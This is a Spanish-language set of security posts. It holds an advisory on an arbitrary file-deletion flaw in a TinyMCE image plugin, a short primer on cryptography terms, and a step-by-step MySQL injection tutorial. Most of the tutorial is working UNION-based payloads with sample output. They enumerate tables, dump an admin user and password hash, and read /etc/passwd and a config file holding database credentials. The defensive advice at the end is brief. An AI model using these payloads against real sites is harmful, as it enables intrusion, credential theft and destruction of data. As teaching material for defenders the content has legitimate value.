http://[path]/admin/includes/tiny_mce/plugins/spellchecker/classes/EnchantSpell.php
http://[path]/admin/includes/tiny_mce/plugins/spellchecker/classes/GoogleSpell.php

Patch :
-El acceso debe estar permitido solo administrador
-Revisar la extension del archivo subido , en este caso el codigo se hizo unicamente para subir archivos de tipo imagen , las extensiones a revisar son : .jpg , .jpeg , .gif , .png

Remote File Remove
Descripcion :
- Permite borrar cualquier archivo del servidor

<?php
...
// Archivo : admin/includes/tiny_mce/plugins/advimage

// Linea : 210
if (isset($_POST['act'])) $act = $_POST['act'];

//Linea : 231
if ($act == 'delete') {
// do delete file
@unlink($IMGFOLDER.'/'.$_POST['fname']);

...
?>

http://[path]/admin/includes/tiny_mce/plugins/advimage/gallery.php
Send :
$_POST["fname"] = "Nombre-del-archivo-a-borrar"
$_POST["act"] = delete

Patch :
-El acceso debe estar permitido solo administrador

Conceptos Basicos en la Criptografia

Segun el Diccionario de la Real Academia, la palabra Criptografia proviene del griego kryptos, que significa oculto, y graphos, que significa escritura, y su definicion es : "Arte de escribir mensajes con clave secreta o de un modo enigmatico".

Definicion mas tecnica

Rama inicial de las Matematicas y en la actualidad de la Informatica y la Telematica, que hace uso de metodos y tecnicas con el objetivo principal de cifrar un mensaje o archivo por medio de un algoritmo, usando una o mas claves , pretendiendo garantizar la Confidencilalidad y la Autenticidad de los mensajes.

Junto a la criptografía coexiste necesariamente otra disciplina: el criptoanalisis, mientras que los criptografos se encargan de desarrollar criptosistemas cada vez mas seguros y dificiles de descifrar los criptoanalistas tratan de romper un criptosistema obteniendo el mensaje a partir del codigo cifrado.

Definiciones Adicionales

Criptografo: maquina o artilugio para cifrar.
Criptosistema: sistema que ofrece medios seguros de comunicacion en los que el emisor oculta o cifra el mensaje antes de
transmitirlo para que solo un receptor autorizado (o nadie) pueda descifrarlo.
Criptologia: ciencia que estudia e investiga todo aquello relacionado con la criptografia: incluye cifra y criptoanalisis.
Criptologo: persona que trabaja de forma legítima para proteger la información creando algoritmos criptograficos.
Criptoanalista: persona cuya funcion es romper algoritmos de cifra en busca de debilidades, la clave o del texto en claro.
Texto en claro: documento original. Se denota comumente como M.
Criptograma: documento/texto cifrado. Se denota comunmente como C.
Claves: datos (llaves) privados/publicos que permitiran cifrar.

Textos de Referencia :
Que es la Criptografia, por rufiopunkrock
Que es la Criptologia, por rufiopunkrock
Criptografia y Seguridad en Computadores, por Manuel J. Lucena Lopez
Curso de Seguridad Informatica y Criptografia, por Jorge Ramio Aguirre

MySQL Injection

Indice

- Introduccion
- Atacando
1.- Detectando la vulnerabilidad
2.- Obteniendo el numero de columnas
3.- Buscando el nombre de tablas
4.- Buscando el nombre de las columnas de una tabla
5.- Obteniendo datos de las tablas
6.- Funcion Load_file
- Defendiendonos

Extras - Descargar

- Sitio Web vulnerable a MySQL Injection
- Codigo Fuente de un Convertidor de Texto a Hexadecimal

---

Introduccion

Inyeccion SQL es una vulnerabilidad informatica en el nivel de la validacion de las entradas a la base de datos de una aplicacion. El origen es el filtrado incorrecto de las variables utilizadas en las partes del programa con codigo SQL. Es, de hecho, un error de una clase mas general de vulnerabilidades que puede ocurrir en cualquier lenguaje de programación o de script que este incrustado dentro de otro.
Una inyeccion SQL sucede cuando se inserta o "inyecta" un codigo SQL "invasor" dentro de otro codigo SQL para alterar su funcionamiento normal, y hacer que se ejecute maliciosamente el codigo "invasor" en la base de datos.

Fuente : Wikipedia

Atacando

1.- Detectando la vulnerabilidad

* Verificar si podemos modificar la consulta
- Utilizaremos caracteres logicos , para modificar las consultas de un sitio web

Andamos viendo un post supongamos , y andamos en la sgte. direccion :
http://localhost/index.php?idpost=2

Analizando un poco ...
Variable : idpost
- Pasa el valor de la ID del post (logico no xD) , entonces para que el sitio web muestre el post que andamos viendo necesita que se le pase ese valor , para luego hacer una consulta a la base de datos .

Ahora veremos si podemos injectar codigo en esa consulta a traves de la variable
http://localhost/index.php?idpost=2 AND 1=0

Consulta original:
select * from tabla where id=2 => devuelve el contenido del post con id igual a 2
Consulta alterada:
select * from tabla where id=2 AND 1=0 => Es falso entonces el sitio web no mostrara nada en pantalla

-En caso que muestre el post , la web no es vulnerable ...

Verificamos una vez mas si podemos modificar la consulta :
http://localhost/index.php?idpost=2 AND 1=1

Consulta alterada:
select * from tabla where id=2 AND 1=1 => Es verdadero , entonces mostrara el post que tenga como ID=2

Comprobamos que la web es vulnerable a injeccion mysql , pero hay dos tipos la clasica (la que vamos a usar xD)
y la injeccion a ciegas (Blind Injection)

Para verificar que tipo de injeccion usamos agregamos una comilla simple al final del valor de la variable :

http://localhost/index.php?idpost=2'

Tambien pueden probar de las sgtes maneras :
http://localhost/index.php?idpost=2) --
http://localhost/index.php?idpost=2') --

Resultado :
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1

- Si no obtenemos el error es muy probable que sea una injeccion a ciegas ...


2.- Obteniendo el numero de columnas

* Utilizando la sentencia "order by"
Con esta sentencia obetenemos un error cuando el numero columnas no exista (sea mayor al numero de columnas)

http://localhost/index.php?idpost=2 order by [El numero de columnas que creas]-

Ejemplo :
Numero de Columnas : 5

http://localhost/index.php?idpost=2 order by 3 => Todo normal 3 es menor que 5
http://localhost/index.php?idpost=2 order by 5 => Todo normal 5 es igual a 5
http://localhost/index.php?idpost=2 order by 6 => Error 6 es mayor que 5
Error : Unknown column '6' in 'order clause'

Hasta el 5 , todo bien , cuando pusimos 6 salio error entonces el numero de columnas es 5 ...

- A veces no funciona este metodo debido a que desactivan los errores , asi que no sabremos cuando dejara de existir el numero de columnas que ingresamos xD.

*Modo usual

http://localhost/index.php?idpost=-2 union select 1,2,3,....,n

Probamos desde 1 hasta un cierto numero hasta que no muestre error
Ejemplo :
http://localhost/index.php?idpost=-2 union select 1--
The used SELECT statements have a different number of columns

http://localhost/index.php?idpost=-2 union select 1,2--
The used SELECT statements have a different number of columns

http://localhost/index.php?idpost=-2 union select 1,2,3--
The used SELECT statements have a different number of columns

http://localhost/index.php?idpost=-2 union select 1,2,3,4--
The used SELECT statements have a different number of columns

http://localhost/index.php?idpost=-2 union select 1,2,3,4,5--
No muestra error

-Mayormente apareceran algunos "numeros" en las partes del post (en este caso , ya que la consulta a la cual estamos injectando devuelve resultados de las partes de un post) , estos numeros son las columnas vulnerables , es decir , aquellos numeros son los que reemplazaremos en la injeccion para obtener informacion .
Ejemplo :

3.- Buscando el nombre de tablas

* Con information_schema
- Funciona siempre y cuando la version del MySQL sea 5 o mas.

Obteniendo la version de MySQL :
Consulta : select version(),2,3,...,n

En nuestro caso :
http://localhost/index.php?idpost=-2 union select version(),2,3,4,5--

En caso que tengan problemas en obtener la version de MySQL, pueden usar estas consultas :
http://localhost/index.php?idpost=-2 union select convert(version() using latin1),2,3,4,5--
http://localhost/index.php?idpost=-2 union select unhex(hex(version())),2,3,4,5--

Resultado :

5.0.51b-community-nt

- Verificando el funcionamiento :
Consulta : select 1,2,...,n from information_schema.tables

En nuestro caso
http://localhost/index.php?idpost=-2 union select 1,2,3,4,5 from information_schema.tables--

Si todo va bien nos aparecen los "numeros" como nos aparecieron antes (como cuando encontramos el numero de columnas)

Ahora extraeremos el nombre de todas las tablas :
http://localhost/index.php?idpost=-2 union select group_concat(table_name),2,3,4,5 from information_schema.tables--

Resultado :
CHARACTER_SETS,COLLATIONS,COLLATION_CHARACTER_SET_APPLICABILITY,COLUMNS,COLUMN_PRIVILEGES,
KEY_COLUMN_USAGE,PROFILING,ROUTINES,SCHEMATA,SCHEMA_PRIVILEGES,STATISTICS,TABLES,TABLE_CONSTRAINTS,
TABLE_PRIVILEGES,TRIGGERS,USER_PRIVILEGES,VIEWS,cds,keywords,pages,stories,writer_permissions,writers,secret_admin,
website

Las tablas que nos interesan son : website , secret_admin
Por logica , la tablas "website" contendra informacion del sitio web , y la tabla "secret_admin" datos sobre los administradores

Pero para los ejemplos tomaremos la tabla : secret_admin

*Modo Usual
- Probando nombre de tablas , cuando no nos muestre error es porque encontramos el nombre de la tabla , este metodo es el que usan los scanners .

Ejemplo :
http://localhost/index.php?idpost=-2 union select 1,2,3,4,5 from users--
Table 'web.users' doesn't exist
http://localhost/index.php?idpost=-2 union select 1,2,3,4,5 from admin--
Table 'web.admin' doesn't exist
http://localhost/index.php?idpost=-2 union select 1,2,3,4,5 from administrador--
Table 'web.administrador' doesn't exist
http://localhost/index.php?idpost=-2 union select 1,2,3,4,5 from secret_admin--
=> dudo que se les ocurra ese nombre de tabla
No hay error , por lo tanto la tabla es secret_admin xD

4.- Buscando el nombre de las columnas de una tabla

* Con information_schema
Consulta : select 1,2,...,n from information_schema.columns where table_name=[nombre de la tabla en hexadecimal]

secret_admin en hexadecimal : 0x7365637265745F61646D696E

En nuestro caso :
http://localhost/index.php?idpost=-2 union select 1,2,3,4,5 from information_schema.columns where table_name=0x7365637265745F61646D696E--

Extraemos el nombre de todas las columnas asi :
http://localhost/index.php?idpost=-2 union select group_concat(column_name),2,3,4,5 from information_schema.columns where table_name=0x7365637265745F61646D696E--

Resultado :

id,secret_user,pass_secret

*Modo Usual
Al igual que el metodo usual para buscar el nombre de las tablas
Ejemplo :
http://localhost/index.php?idpost=-2 union select user,2,3,4,5 from secret_admin--
Unknown column 'user' in 'field list'
http://localhost/index.php?idpost=-2 union select admin,2,3,4,5 from secret_admin--
Unknown column 'admin' in 'field list'
http://localhost/index.php?idpost=-2 union select secret_user,2,3,4,5 from secret_admin--
No hay error , por lo tanto el nombre de una de las columnas de la tabla "secret_admin" es "secret_user"

5.- Obteniendo datos de las tablas
Consulta : select [nombre_de_la columna],2,3,...,n from [nombre_de_la_tablas]

En nuestro caso :
http://localhost/index.php?idpost=-2 union select secret_user,2,3,4,5 from secret_admin--

Extrayendo todos los datos de las columnas con una consulta :
Consulta :
select concat_ws([nexo_de_los_resultados_en_hexadecimal],[nombre_de_columna1],...,[nombre_de_columna_n),2,3,...n from [nombre_de_tabla]--

Nexo mas usual => ' : ' en hex '0x3a'

En nuestro caso :
http://localhost/index.php?idpost=-2 union select concat_ws(0x3a,id,secret_user,pass_secret),2,3,4,5 from secret_admin--

Resultado :

1:admin:659f10281a6c120caf80331c9ea954d8

- Lo unico que nos quedaria seria crackear el hash del admin , luego buscar el panel de administracion y logearnos ...

6.- Funcion Load_file
Esta funcion nos permite leer archivos , no siempre esta disponible debido a los permisos de usuario.
A esta funcion se le pasa el parametro de la ruta del archivo que queremos leer y nos lo devuelve en una cadena.

Consulta : select load_file('ruta_del_archivo')
En una injeccion : select load_file([ruta_del_archivo_en_hexadecimal])
-Convertimos la ruta del archivo a hexadecimal debido a que no podemos usar las comillas , debido a las magic_quotes_gpc que estan activadas por defecto en PHP5 .

/etc/passwd => 0x2F6574632F706173737764

En nuestro caso :
http://localhost/index.php?idpost=-2 union select load_file(0x2F6574632F706173737764),2,3,4,5--

Resultado :
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
..............

Supongamos que tenemos la ruta de la web : /opt/lampp/htdocs/website/
Podriamos buscar archivos comencemos por el index.php que es lo que no le falta a ninguna web xD

/opt/lampp/htdocs/website/index.php => 0x2F6F70742F6C616D70702F6874646F63732F776562736974652F696E6465782E706870

http://localhost/index.php?idpost=-2 union select load_file(0x2F6F70742F6C616D70702F6874646F63732F776562736974652F696E6465782E706870),2,3,4,5--

Resultado :
<?php
include_once("config.php");
include_once("functions.php");
................
?>

Como vemos conseguimos el nombre de otros archivos , revisemos el config.php

config.php => 0x2F6F70742F6C616D70702F6874646F63732F776562736974652F636F6E6669672E706870

http://localhost/index.php?idpost=-2 union select load_file(0x2F6F70742F6C616D70702F6874646F63732F776562736974652F636F6E6669672E706870),2,3,4,5--

Resultado :
<?php
$connection=mysql_connect("localhost","root","password");
mysql_select_db("website",$connection);
?>

- Asi obtuvimos lo datos de mysql xD , y pueden buscar mas cosas es cuestion de pensar un poco , analizar las cosas y tener mucha paciencia
- A veces no podemos mostrar el contenido de los archivos .php debido a que probablemente usen para mostrar los contenidos funciones como htmlentites , htmlspecialchars , entre otras ...

Defendiendonos

* Filtrar los datos
- Si la aplicacion espera alguna entrada numérica, considere la verificación de información con is_numeric(), o modifique silenciosamente su tipo usando settype() para asegurarnos del tipo de variable que queremos manejar sea el correcto.
Ejemplo :
http://localhost/index.php?idpost=2

La variable "idpost" siempre sera un valor numero entonces nos aseguraremos que manejamos el tipo de variable correcto con la funcion intval :

$id=intval($_GET['idpost]);

Function intval :
Devuelve el valor integer de var , usando la base especificada para la conversión (la base predeterminada es 10).

Valores retornados
El valor entero de var en caso de exito, o 0 si ocurre un error. Las matrices y objetos vacíos devuelven 0, las matrices y objetos no-vacíos devuelven 1.

- Usando str_replace o expresiones regulares
- En caso de no estar activadas las "magic_quotes_gpc" , deben utilizar funciones como addslashes() o mysql_escape_string() , para filtrar las comillas

Mas Informacion :
PHP.NET > Seguridad > Seguridad de Base de Datos > Inyeccion de SQL > Tecnicas de Proteccion
=> No puse el enlace porque el tutorial esta inactivo asi que si lo tienen en documento revisenlo =)

Saludos!

Este tutorial se puede copiar, modificar y distribuir respetando el autor